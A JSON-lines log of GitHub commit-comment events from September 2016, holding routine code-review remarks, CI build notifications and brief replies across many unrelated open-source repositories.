{"id":"4556566747","type":"CommitCommentEvent","actor":{"login":"DenisCarriere"},"repo":{"name":"osmottawa/imports"},"payload":{"comment":{"id":19004107,"position":318,"line":934,"path":"CECCE/schools.geojson","commit_id":"01a7e28c28865781af33b8a413c241244ead261c","created_at":"2016-09-13T16:01:01Z","updated_at":"2016-09-13T16:01:01Z","body":"Missing quotes `\"` @james2432 "}},"created_at":"2016-09-13T16:01:01Z"}
{"id":"4556571730","type":"CommitCommentEvent","actor":{"login":"billy1arm"},"repo":{"name":"mangoszero/server"},"payload":{"comment":{"id":19004118,"position":null,"line":null,"path":null,"commit_id":"cdd3489f08028e48fad6dfaf1254f441855610ee","created_at":"2016-09-13T16:01:46Z","updated_at":"2016-09-13T16:01:46Z","body":"@Elmo337 - we are checking this now\r\n"}},"created_at":"2016-09-13T16:01:46Z"}
{"id":"4556574025","type":"CommitCommentEvent","actor":{"login":"james2432"},"repo":{"name":"osmottawa/imports"},"payload":{"comment":{"id":19004123,"position":318,"line":934,"path":"CECCE/schools.geojson","commit_id":"01a7e28c28865781af33b8a413c241244ead261c","created_at":"2016-09-13T16:02:09Z","updated_at":"2016-09-13T16:02:09Z","body":"Already corrected"}},"created_at":"2016-09-13T16:02:09Z"}
{"id":"4556578401","type":"CommitCommentEvent","actor":{"login":"DenisCarriere"},"repo":{"name":"osmottawa/imports"},"payload":{"comment":{"id":19004130,"position":371,"line":1089,"path":"CECCE/schools.geojson","commit_id":"01a7e28c28865781af33b8a413c241244ead261c","created_at":"2016-09-13T16:02:46Z","updated_at":"2016-09-13T16:02:46Z","body":"This one is good\r\n![image](https://cloud.githubusercontent.com/assets/550895/18481373/f916e8ba-79a9-11e6-9037-010dc75492fb.png)\r\n"}},"created_at":"2016-09-13T16:02:46Z"}
{"id":"4556585194","type":"CommitCommentEvent","actor":{"login":"langsamu"},"repo":{"name":"ukpds/data-driven"},"payload":{"comment":{"id":19004145,"position":null,"line":null,"path":null,"commit_id":"3dfa18706bfcdf4d0ece923ec7cd22ee0ee2375a","created_at":"2016-09-13T16:03:50Z","updated_at":"2016-09-13T16:03:50Z","body":"That should be http://13.95.91.76/repositories/DataDriven @ 22"}},"created_at":"2016-09-13T16:03:50Z"}
{"id":"4556585440","type":"CommitCommentEvent","actor":{"login":"DenisCarriere"},"repo":{"name":"osmottawa/imports"},"payload":{"comment":{"id":19004147,"position":null,"line":null,"path":null,"commit_id":"01a7e28c28865781af33b8a413c241244ead261c","created_at":"2016-09-13T16:03:52Z","updated_at":"2016-09-13T16:03:52Z","body":"@james2432 I'll let you clean that last commit, a few roads you overlapped from my last commit."}},"created_at":"2016-09-13T16:03:52Z"}
{"id":"4556586175","type":"CommitCommentEvent","actor":{"login":"ppescher"},"repo":{"name":"geolink/opentracker"},"payload":{"comment":{"id":19004151,"position":null,"line":null,"path":null,"commit_id":"def3fb8bae307c41dd8fb86d08fc6d4ed9b479c7","created_at":"2016-09-13T16:04:00Z","updated_at":"2016-09-13T16:04:00Z","body":"Thanks for testing!\r\n\r\nPlease make sure you use opentracker-arduino-board v1.0.4 (new release), as it prevents output on the USB console to hang the device when USB is disabled.\r\n\r\nNote also that the device is still operational with slower CPU clock, so the LED should keep blinking if you call addon_delay() or status_delay()."}},"created_at":"2016-09-13T16:04:00Z"}
{"id":"4556587839","type":"CommitCommentEvent","actor":{"login":"langsamu"},"repo":{"name":"ukpds/data-driven"},"payload":{"comment":{"id":19004154,"position":7,"line":22,"path":"config/application.rb","commit_id":"3dfa18706bfcdf4d0ece923ec7cd22ee0ee2375a","created_at":"2016-09-13T16:04:16Z","updated_at":"2016-09-13T16:04:16Z","body":"That should be http://13.95.91.76/repositories/DataDriven"}},"created_at":"2016-09-13T16:04:16Z"}
{"id":"4556591188","type":"CommitCommentEvent","actor":{"login":"bbm3h14aku"},"repo":{"name":"nikkimas/ProBank"},"payload":{"comment":{"id":19004159,"position":null,"line":null,"path":null,"commit_id":"c25424eb6d8f8d84660b8ffeede9e6a306cf847c","created_at":"2016-09-13T16:04:46Z","updated_at":"2016-09-13T16:04:46Z","body":"Die While schleife solltest du vielleicht noch fixen, wenn ich das grade richtig gesehen habe wird die nicht mehr benötigt"}},"created_at":"2016-09-13T16:04:46Z"}
{"id":"4556593652","type":"CommitCommentEvent","actor":{"login":"james2432"},"repo":{"name":"osmottawa/imports"},"payload":{"comment":{"id":19004166,"position":null,"line":null,"path":null,"commit_id":"01a7e28c28865781af33b8a413c241244ead261c","created_at":"2016-09-13T16:05:05Z","updated_at":"2016-09-13T16:05:05Z","body":"@DenisCarriere Committed."}},"created_at":"2016-09-13T16:05:05Z"}
{"id":"4556597918","type":"CommitCommentEvent","actor":{"login":"sacsri"},"repo":{"name":"sacsri/Sachin1"},"payload":{"comment":{"id":19004176,"position":null,"line":null,"path":null,"commit_id":"137820644df483dfb45e8976b1f5bcefff306893","created_at":"2016-09-13T16:05:46Z","updated_at":"2016-09-13T16:05:46Z","body":"please add a genric method for the applied field"}},"created_at":"2016-09-13T16:05:46Z"}
{"id":"4556601928","type":"CommitCommentEvent","actor":{"login":"leethargo"},"repo":{"name":"SCIP-Interfaces/SCIP.jl"},"payload":{"comment":{"id":19004192,"position":null,"line":null,"path":null,"commit_id":"82318184c4143d223831b8d9effde30bf1c114fe","created_at":"2016-09-13T16:06:24Z","updated_at":"2016-09-13T16:06:24Z","body":"Good :smile:. To be honest, that was some cargo cult programming where I was inspired by the `build.jl` of GLPK etc."}},"created_at":"2016-09-13T16:06:24Z"}
{"id":"4556604061","type":"CommitCommentEvent","actor":{"login":"iapazmino"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19004199,"position":6,"line":15,"path":"glossary.md","commit_id":"669d3f9158ef87d20bf4bf2e18028c7b896d9cd9","created_at":"2016-09-13T16:06:46Z","updated_at":"2016-09-13T16:06:46Z","body":"We were not sure that was an accurate description and did not have a place where it has been used yet."}},"created_at":"2016-09-13T16:06:46Z"}
{"id":"4556604658","type":"CommitCommentEvent","actor":{"login":"ciaodarwin"},"repo":{"name":"EvilAcid/c"},"payload":{"comment":{"id":19004202,"position":null,"line":null,"path":null,"commit_id":"3eba0546206c033f9e704ee1f9933c24e87e4337","created_at":"2016-09-13T16:06:52Z","updated_at":"2016-09-13T16:06:52Z","body":"Oh jaa"}},"created_at":"2016-09-13T16:06:52Z"}
{"id":"4556611060","type":"CommitCommentEvent","actor":{"login":"joseluizcoe"},"repo":{"name":"kytos/website"},"payload":{"comment":{"id":19004218,"position":null,"line":null,"path":null,"commit_id":"73fab20447e32f4794e4852b09e1c75ea3f0d32f","created_at":"2016-09-13T16:07:46Z","updated_at":"2016-09-13T16:07:46Z","body":"This commit delivery the first version of \"Napps App Home Page\".\r\n![napps-desktop](https://cloud.githubusercontent.com/assets/32010/18481581/053a3724-79b3-11e6-86dd-2ad25a89ad70.png)\r\n"}},"created_at":"2016-09-13T16:07:46Z"}
{"id":"4556611476","type":"CommitCommentEvent","actor":{"login":"ppescher"},"repo":{"name":"geolink/opentracker"},"payload":{"comment":{"id":19004220,"position":null,"line":null,"path":null,"commit_id":"def3fb8bae307c41dd8fb86d08fc6d4ed9b479c7","created_at":"2016-09-13T16:07:49Z","updated_at":"2016-09-13T16:07:49Z","body":"By the way, disabling USB alone should save around 25mA at 12V input.\r\nI'm planning to disable USB with ignition OFF, to save the battery when the vehicle is parked. It could be disabled altogether, but that would make it difficult to debug.\r\nI think I will add some config build option in \"tracker.h\" for that."}},"created_at":"2016-09-13T16:07:49Z"}
{"id":"4556612034","type":"CommitCommentEvent","actor":{"login":"getogrand"},"repo":{"name":"triplepy/sh8email-django"},"payload":{"comment":{"id":19004221,"position":6,"line":31,"path":"rest/views.py","commit_id":"a9f417fd68b857a5df9f51cb8eb7c42a8ed2a2c0","created_at":"2016-09-13T16:07:54Z","updated_at":"2016-09-13T16:07:54Z","body":"I think this code should not be here.\r\nHow about add a method is_secret() to Mail class?"}},"created_at":"2016-09-13T16:07:54Z"}
{"id":"4556634386","type":"CommitCommentEvent","actor":{"login":"paglias"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":19004263,"position":19,"line":317,"path":"website/client/js/controllers/settingsCtrl.js","commit_id":"9cd7bd8ab79ba5447c90ac0c581de03fda876d33","created_at":"2016-09-13T16:11:20Z","updated_at":"2016-09-13T16:11:20Z","body":"When using find you should return true if the item matches or false if it doesn't and the item will be the result of the find call. This way it'll always return the first network because `network.name` is treated as a truthy value"}},"created_at":"2016-09-13T16:11:20Z"}
{"id":"4556651883","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19004313,"position":42,"line":0,"path":"js/js.libraries/src/core/collections/AbstractCollection.kt","commit_id":"5de70252213be5975852f4c511f037e1cf629ded","created_at":"2016-09-13T16:14:08Z","updated_at":"2016-09-13T16:14:08Z","body":"The implementation is JS-specific. In JVM the implementation of `toArray` is provided implicitly by compiler, however one could override it with \"accidental\" override technique. There were some debates in how `toArray` should be available for implementation in JVM."}},"created_at":"2016-09-13T16:14:08Z"}
{"id":"4556652270","type":"CommitCommentEvent","actor":{"login":"crookedneighbor"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":19004314,"position":19,"line":317,"path":"website/client/js/controllers/settingsCtrl.js","commit_id":"9cd7bd8ab79ba5447c90ac0c581de03fda876d33","created_at":"2016-09-13T16:14:11Z","updated_at":"2016-09-13T16:14:11Z","body":"Yeah, it should be `return network.key === networkKey`"}},"created_at":"2016-09-13T16:14:11Z"}
{"id":"4556658001","type":"CommitCommentEvent","actor":{"login":"Kostronor"},"repo":{"name":"Minecolonies/minecolonies"},"payload":{"comment":{"id":19004329,"position":5,"line":16,"path":"src/main/resources/assets/minecolonies/lang/en_US.lang","commit_id":"9fbadc01e8dc3a5e8dec98ae2935fc88bc2d0d26","created_at":"2016-09-13T16:15:05Z","updated_at":"2016-09-13T16:15:05Z","body":"What happened here? "}},"created_at":"2016-09-13T16:15:05Z"}
{"id":"4556659762","type":"CommitCommentEvent","actor":{"login":"Arie"},"repo":{"name":"Arie/serveme"},"payload":{"comment":{"id":19004331,"position":5,"line":16,"path":"script/logdaemon","commit_id":"b4f0bd62f318f5fbdc8eb4884a6e8595383eea0a","created_at":"2016-09-13T16:15:24Z","updated_at":"2016-09-13T16:15:24Z","body":"No, I removed that a while ago."}},"created_at":"2016-09-13T16:15:24Z"}
{"id":"4556662022","type":"CommitCommentEvent","actor":{"login":"topsecretcoder"},"repo":{"name":"4d4/Hydrogen"},"payload":{"comment":{"id":19004337,"position":null,"line":null,"path":null,"commit_id":"a833b17c3f980c6210f2fc1a70717b86194e92fb","created_at":"2016-09-13T16:15:45Z","updated_at":"2016-09-13T16:15:45Z","body":"Can you raise a pull request for the branch created for 4d4?"}},"created_at":"2016-09-13T16:15:45Z"}
{"id":"4556665509","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19004346,"position":null,"line":null,"path":null,"commit_id":"ef672270b35153d03811baef33408efaa9e3c399","created_at":"2016-09-13T16:16:20Z","updated_at":"2016-09-13T16:16:20Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ef672270b35153d03811baef33408efaa9e3c399-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ef672270b35153d03811baef33408efaa9e3c399-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T16:16:20Z"}
{"id":"4556670635","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19004368,"position":10,"line":0,"path":"js/js.libraries/src/core/collections/AbstractCollection.kt","commit_id":"5de70252213be5975852f4c511f037e1cf629ded","created_at":"2016-09-13T16:17:10Z","updated_at":"2016-09-13T16:17:10Z","body":"Another option is to have `AbstractMutableCollection` to be not a typealias, but rather an inheritor of `j.u.AbstractCollection`. Then we could make these methods to be `abstract override`"}},"created_at":"2016-09-13T16:17:10Z"}
{"id":"4556676675","type":"CommitCommentEvent","actor":{"login":"smiles1969"},"repo":{"name":"Cacti/cacti"},"payload":{"comment":{"id":19004392,"position":null,"line":null,"path":null,"commit_id":"f60e04a7ceca1d9ad75f6b1f2386a05cc463f90d","created_at":"2016-09-13T16:18:07Z","updated_at":"2016-09-13T16:18:07Z","body":"Appears to be working for me... Thank you!"}},"created_at":"2016-09-13T16:18:07Z"}
{"id":"4556681250","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":19004408,"position":null,"line":null,"path":null,"commit_id":"6611430095fc82b427b1d42208d928036c9c5c44","created_at":"2016-09-13T16:18:52Z","updated_at":"2016-09-13T16:18:52Z","body":"that was fast, GL for LTC!"}},"created_at":"2016-09-13T16:18:52Z"}
{"id":"4556683307","type":"CommitCommentEvent","actor":{"login":"wansco"},"repo":{"name":"meanjs/mean"},"payload":{"comment":{"id":19004419,"position":null,"line":null,"path":null,"commit_id":"4f3a501063cf6023c1cc93007e786be54cf763b7","created_at":"2016-09-13T16:19:13Z","updated_at":"2016-09-13T16:19:13Z","body":"0 or 1 optional tests probably do not need a progress bar, so we can just hide it in signup.client.view.html (the error messages should handle user notification for that case). I do like the colors, so I duplicated the progress bar array, but we could eliminate that if its too verbose. I also provided the option if those 3 ranges are not defined, to fallback on the percentage dual color scheme in password-validator.client.directive.js. I think far more people will stick with the 2-4 optional tests rather than add more, but this \"should\" handle all of those cases.\r\n\r\nI made these changes on my repo:\r\nhttps://github.com/meanjs/mean/compare/master...wansco:master?expand=1\r\n\r\nI'll be out of town for the next week or so, so I probably wont get to creating a new PR anytime soon. I could probably clean up password-validator.client.directive.js considerably and run this through a bunch more tests.\r\n\r\nI also broke the existing tests by injecting $window in password-validator.client.directive.js (to get access to the sharedConfig object). I need to figure that one out.\r\n"}},"created_at":"2016-09-13T16:19:13Z"}
{"id":"4556685508","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":19004426,"position":null,"line":null,"path":null,"commit_id":"6611430095fc82b427b1d42208d928036c9c5c44","created_at":"2016-09-13T16:19:36Z","updated_at":"2016-09-13T16:19:36Z","body":"Good luck for LTC!\r\nBtw the LTC test was set to 10+0.1\r\nSo I had to terminate."}},"created_at":"2016-09-13T16:19:36Z"}
{"id":"4556687791","type":"CommitCommentEvent","actor":{"login":"dalelotts"},"repo":{"name":"dalelotts/angular-bootstrap-datetimepicker"},"payload":{"comment":{"id":19004433,"position":null,"line":null,"path":null,"commit_id":"3de0d25bfeca9c9e04d4af04336d4f29d08e2215","created_at":"2016-09-13T16:19:58Z","updated_at":"2016-09-13T16:19:58Z","body":"Also fixes #330 "}},"created_at":"2016-09-13T16:19:58Z"}
{"id":"4556688979","type":"CommitCommentEvent","actor":{"login":"aengelke"},"repo":{"name":"lrr-tum/dbrew"},"payload":{"comment":{"id":19004439,"position":null,"line":null,"path":null,"commit_id":"a31a140b9f80eb424585f05580ef2caee7309ab3","created_at":"2016-09-13T16:20:13Z","updated_at":"2016-09-13T16:20:13Z","body":"One question: how do I encode a 32 or 64 bit XMM (not MMX) register operand with this new design?"}},"created_at":"2016-09-13T16:20:13Z"}
{"id":"4556691928","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19004442,"position":null,"line":null,"path":null,"commit_id":"4cebfe64699a3e6e998c5bf28cd6ecafee2a1a12","created_at":"2016-09-13T16:20:42Z","updated_at":"2016-09-13T16:20:42Z","body":"++"}},"created_at":"2016-09-13T16:20:42Z"}
{"id":"4556703747","type":"CommitCommentEvent","actor":{"login":"msuchard"},"repo":{"name":"OHDSI/MethodEvaluation"},"payload":{"comment":{"id":19004468,"position":null,"line":null,"path":null,"commit_id":"16eb0f722ae2882b1395c06a198a191cfdd788eb","created_at":"2016-09-13T16:22:42Z","updated_at":"2016-09-13T16:22:42Z","body":"@schuemie What happens in `Cyclops` when all \\beta == 0.0?  Does it return the wrong prediction?"}},"created_at":"2016-09-13T16:22:42Z"}
{"id":"4556703923","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19004470,"position":null,"line":null,"path":null,"commit_id":"aae5fd0c3d8ba5238028e77e31aa58852b121d47","created_at":"2016-09-13T16:22:44Z","updated_at":"2016-09-13T16:22:44Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 990](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13198&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-13T16:22:44Z"}
{"id":"4556705395","type":"CommitCommentEvent","actor":{"login":"giorgichi"},"repo":{"name":"giorgichi/testweb"},"payload":{"comment":{"id":19004473,"position":3,"line":2,"path":"params.json","commit_id":"40222f90ab5b0e99d58052b09a4db0e65e3fa429","created_at":"2016-09-13T16:22:59Z","updated_at":"2016-09-13T16:22:59Z","body":"I think this screwed up a lot!"}},"created_at":"2016-09-13T16:22:59Z"}
{"id":"4556707890","type":"CommitCommentEvent","actor":{"login":"ianoc"},"repo":{"name":"ianoc/rules_scala"},"payload":{"comment":{"id":19004474,"position":28,"line":216,"path":"scala/scala.bzl","commit_id":"2aaff851d8ede345cbc8736c32204d47a7940ff1","created_at":"2016-09-13T16:23:24Z","updated_at":"2016-09-13T16:23:24Z","body":"So this works as I hoped/expected. For every set of jvm flags you get a different worker process and they all stay running. So you can compile different parts of your app (for whatever reason?) with different settings here and it all behaves correctly"}},"created_at":"2016-09-13T16:23:24Z"}
{"id":"4556709303","type":"CommitCommentEvent","actor":{"login":"sylvestre"},"repo":{"name":"opencollab/arpack-ng"},"payload":{"comment":{"id":19004477,"position":5,"line":12,"path":"CMakeLists.txt","commit_id":"b0e2a142585fa6f2000edeb5be462367e8aaa2c3","created_at":"2016-09-13T16:23:38Z","updated_at":"2016-09-13T16:23:38Z","body":"I don't know what it is, could you add a comment?"}},"created_at":"2016-09-13T16:23:38Z"}
{"id":"4556711708","type":"CommitCommentEvent","actor":{"login":"shsu"},"repo":{"name":"edvisor-io/docker-nginx-node"},"payload":{"comment":{"id":19004484,"position":null,"line":null,"path":null,"commit_id":"7d426b018285e5316e67be090c568498f4c3cc2a","created_at":"2016-09-13T16:24:02Z","updated_at":"2016-09-13T16:24:02Z","body":"Thanks for the heads up. I just realized it broke mine too."}},"created_at":"2016-09-13T16:24:02Z"}
{"id":"4556715295","type":"CommitCommentEvent","actor":{"login":"Security2431"},"repo":{"name":"tagopen/pravo"},"payload":{"comment":{"id":19004491,"position":null,"line":null,"path":null,"commit_id":"3b866af03dc256c54e9ffa2a467837605caba39a","created_at":"2016-09-13T16:24:39Z","updated_at":"2016-09-13T16:24:39Z","body":"# Исправлен equialHeight в модальном окне\r\n```\r\n$(window).on('resize', function(){\r\n  if( $( window ).width() >= 768 ) {\r\n  $('.modal__height').equialHeight();\r\n  }\r\n}).trigger('resize');\r\n```\r\nДело в том, что если вызывать equialHeight через обработчик ```onresize```, то блоки равны максимальному значению ```padding``` этих блоков. Вся проблема в модальном окне. По умолчанию, модальное окно скрыто, а equialHeight вызывается после загрузки страницы. Поэтому блоки через eqiualHeight неправильно высчитывались.\r\nБыло решено поместить код equialHeight в обработчик ```shown.bs.modal```.\r\n```\r\n$('#destroy').on('shown.bs.modal', function () {\r\n if( $( window ).width() >= 768 ) {\r\n  $('.modal__height').equialHeight();\r\n }\r\n});\r\n```\r\nПосле вынесения ```equialHeight``` кода в обработчик  ```shown.bs.modal```, высота блоков вычислялась правильно, потому что, equialHeight срабатывал, когда модальное окно со всеми элементами отобразится в браузере."}},"created_at":"2016-09-13T16:24:39Z"}
{"id":"4556720317","type":"CommitCommentEvent","actor":{"login":"VladimirMangos"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19004502,"position":18,"line":5544,"path":"src/game/SpellEffects.cpp","commit_id":"6fb00d32ebfbfea540c3ca899587737a99e8c378","created_at":"2016-09-13T16:25:33Z","updated_at":"2016-09-13T16:25:33Z","body":"How this part can be called if you guard all by  if (m_CastItem)"}},"created_at":"2016-09-13T16:25:33Z"}
{"id":"4556724288","type":"CommitCommentEvent","actor":{"login":"kwonn"},"repo":{"name":"sunset1215/rcs"},"payload":{"comment":{"id":19004512,"position":null,"line":null,"path":null,"commit_id":"904fc6aff546e28c14ed88cfb28f544d05690602","created_at":"2016-09-13T16:26:14Z","updated_at":"2016-09-13T16:26:14Z","body":"@sunset1215 So how do I resolve the error?"}},"created_at":"2016-09-13T16:26:14Z"}
{"id":"4556724642","type":"CommitCommentEvent","actor":{"login":"leodemoura"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":19004514,"position":11,"line":11,"path":"tests/lean/run/let3.lean","commit_id":"0b90ace9f8b284b7ef96d826a42842ac58dcadec","created_at":"2016-09-13T16:26:17Z","updated_at":"2016-09-13T16:26:17Z","body":"@Kha We are planning to rename it to `obtain`. The problem is that this is not a regular `let`. \r\nFor example, with the \"real\" `let`, we can write the following type correct expression.\r\n```\r\nlet n := 10 in\r\nexists (v : vector nat n) (w : vector nat 10), v = w\r\n```\r\nThis expression type checks because `vector nat n` and `vector nat 10` are definitionally equal by `zeta`-reduction (i.e., replacing the let-decl with its value).\r\nThe `let`+pattern does not support `zeta`-reduction since it is syntax sugar for `match`.\r\nFor example, the following example is type incorrect:\r\n```\r\nlet (n, m) := (10, 10) in\r\nexists (v : vector nat n) (w : vector nat m), v = w\r\n```\r\nThe new syntax will be\r\n```\r\nobtain (a, b, c) := p1 in\r\na + b + c\r\n```\r\nfor programmers, and\r\n```\r\nobtain (a, b, c), from p1, \r\na + b + c\r\n```\r\nfor lean2 users that like the current `obtain` syntax.\r\n"}},"created_at":"2016-09-13T16:26:17Z"}
{"id":"4556726231","type":"CommitCommentEvent","actor":{"login":"Santiagoebizmarts"},"repo":{"name":"ebizmarts/magemonkey"},"payload":{"comment":{"id":19004519,"position":null,"line":null,"path":null,"commit_id":"baac9ab1e3178041190834cf7e2e8a1b8ae556fb","created_at":"2016-09-13T16:26:31Z","updated_at":"2016-09-13T16:26:31Z","body":"closes #147 "}},"created_at":"2016-09-13T16:26:31Z"}
{"id":"4556729756","type":"CommitCommentEvent","actor":{"login":"appliedx"},"repo":{"name":"appliedx/edx-app-ios"},"payload":{"comment":{"id":19004531,"position":null,"line":null,"path":null,"commit_id":"85590db25338a1bd3d87b423cc6463137642c68c","created_at":"2016-09-13T16:27:06Z","updated_at":"2016-09-13T16:27:06Z","body":"Customization of VideoPlayer bar and settings button frame changes"}},"created_at":"2016-09-13T16:27:06Z"}
{"id":"4556730549","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":19004536,"position":null,"line":null,"path":null,"commit_id":"5179da9d1e2ec6efde2b521873325630f7bdcb7b","created_at":"2016-09-13T16:27:14Z","updated_at":"2016-09-13T16:27:14Z","body":"you might have to include the \r\n```services:\r\n    postgresql```` thing\r\n"}},"created_at":"2016-09-13T16:27:14Z"}
{"id":"4556736191","type":"CommitCommentEvent","actor":{"login":"majensen"},"repo":{"name":"NCIP/gdc-docs"},"payload":{"comment":{"id":19004550,"position":11,"line":10,"path":"docs/Data/Release_Notes/Data_Release_Notes.md","commit_id":"944a12475bbaa6c6c870204e0fb2dd1f948bcd5d","created_at":"2016-09-13T16:28:10Z","updated_at":"2016-09-13T16:28:10Z","body":"@msfitzsimons sorry to kibitz Michael, maybe should emphasize 'only on Legacy Portal'? "}},"created_at":"2016-09-13T16:28:10Z"}
{"id":"4556740956","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19004561,"position":null,"line":null,"path":null,"commit_id":"cc3473e8b825046fea8f86cb1959d3c30751b862","created_at":"2016-09-13T16:29:00Z","updated_at":"2016-09-13T16:29:00Z","body":"The following doc(s) have been deployed to the [1863migrat](https://1863migrat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate](https://1863migrat-static-docs.pantheonsite.io/docs/migrate)\n- [docs/migrate-manual](https://1863migrat-static-docs.pantheonsite.io/docs/migrate-manual)\n- [docs/migrate-wordpress](https://1863migrat-static-docs.pantheonsite.io/docs/migrate-wordpress)\n"}},"created_at":"2016-09-13T16:29:00Z"}
{"id":"4556741086","type":"CommitCommentEvent","actor":{"login":"sebastianmarzjan"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19004562,"position":5,"line":15,"path":"extensions/wikia/CommunityPage/styles/components/_header.scss","commit_id":"422706978c321a4ede4220a98acacb9651c64e7d","created_at":"2016-09-13T16:29:01Z","updated_at":"2016-09-13T16:29:01Z","body":"Can we remove this line?"}},"created_at":"2016-09-13T16:29:01Z"}
{"id":"4556742666","type":"CommitCommentEvent","actor":{"login":"sebastianmarzjan"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19004567,"position":4,"line":4,"path":"extensions/wikia/CommunityPage/templates/pageHeader.mustache","commit_id":"422706978c321a4ede4220a98acacb9651c64e7d","created_at":"2016-09-13T16:29:19Z","updated_at":"2016-09-13T16:29:19Z","body":"Warning! Hardcoded message string"}},"created_at":"2016-09-13T16:29:19Z"}
{"id":"4556750469","type":"CommitCommentEvent","actor":{"login":"peterkohaut"},"repo":{"name":"peterkohaut/scummvm"},"payload":{"comment":{"id":19004589,"position":null,"line":null,"path":null,"commit_id":"a51691ce37664fd8300a60206b5e7bd2b98e27f7","created_at":"2016-09-13T16:30:38Z","updated_at":"2016-09-13T16:30:38Z","body":"Thx for info, but I don't have much time for doing this (work, personal life), so for me it's hard to guarantee active development. And I'm developing only on msvc15 and I started with this because I wanted to learn IDA disassembler (and I love blade runner :)). I think more active developers is what this engine needs. and most of engine code was written by @madmoose  "}},"created_at":"2016-09-13T16:30:38Z"}
{"id":"4556757607","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":19004607,"position":null,"line":null,"path":null,"commit_id":"6611430095fc82b427b1d42208d928036c9c5c44","created_at":"2016-09-13T16:31:56Z","updated_at":"2016-09-13T16:31:56Z","body":"@ajithcj \r\nThanks...now fixed."}},"created_at":"2016-09-13T16:31:56Z"}
{"id":"4556762653","type":"CommitCommentEvent","actor":{"login":"ashishkotnala29"},"repo":{"name":"dior-zj/android_device_xiaomi_dior"},"payload":{"comment":{"id":19004619,"position":null,"line":null,"path":null,"commit_id":"c2353b4ab758afbe0fd71c6a95dcbcb19acedb3b","created_at":"2016-09-13T16:32:50Z","updated_at":"2016-09-13T16:32:50Z","body":"This file has nothing to do with the build bro. It's just a record of what blobs we use for keeping track."}},"created_at":"2016-09-13T16:32:50Z"}
{"id":"4556770761","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19004643,"position":null,"line":null,"path":null,"commit_id":"aae5fd0c3d8ba5238028e77e31aa58852b121d47","created_at":"2016-09-13T16:34:16Z","updated_at":"2016-09-13T16:34:16Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 990](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13198&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:11:31"}},"created_at":"2016-09-13T16:34:16Z"}
{"id":"4556775310","type":"CommitCommentEvent","actor":{"login":"eliaslfox"},"repo":{"name":"Team4159/birds"},"payload":{"comment":{"id":19004649,"position":null,"line":null,"path":null,"commit_id":"7cc6115ca8469035016880ce372e4b6f6929bb01","created_at":"2016-09-13T16:35:05Z","updated_at":"2016-09-13T16:35:05Z","body":"lol"}},"created_at":"2016-09-13T16:35:05Z"}
{"id":"4556775844","type":"CommitCommentEvent","actor":{"login":"hbrunn"},"repo":{"name":"OCA/OCB"},"payload":{"comment":{"id":19004651,"position":null,"line":null,"path":null,"commit_id":"a7dc3e17066274763d890d2b19bfa823091fdc0c","created_at":"2016-09-13T16:35:10Z","updated_at":"2016-09-13T16:35:10Z","body":"turn out there's a lot more wrong than document_ftp. Specifically with the account module, this can't be sensibly solved by simply excluding stuff. Whoever wants proper tests in 7 will need to look into this and fix the tests"}},"created_at":"2016-09-13T16:35:10Z"}
{"id":"4556778617","type":"CommitCommentEvent","actor":{"login":"morlovich"},"repo":{"name":"pagespeed/ngx_pagespeed"},"payload":{"comment":{"id":19004656,"position":null,"line":null,"path":null,"commit_id":"8bf48ac77d7ba92487ce57a54e1c82bd36168a50","created_at":"2016-09-13T16:35:39Z","updated_at":"2016-09-13T16:35:39Z","body":"Could you elaborate on the problem you're seeing? \r\nNote that this corresponds to building PSOL from branch, not with using the PSOL library. I guess we may need to edit the docs to suggest building off release tag for that?\r\n\r\n"}},"created_at":"2016-09-13T16:35:39Z"}
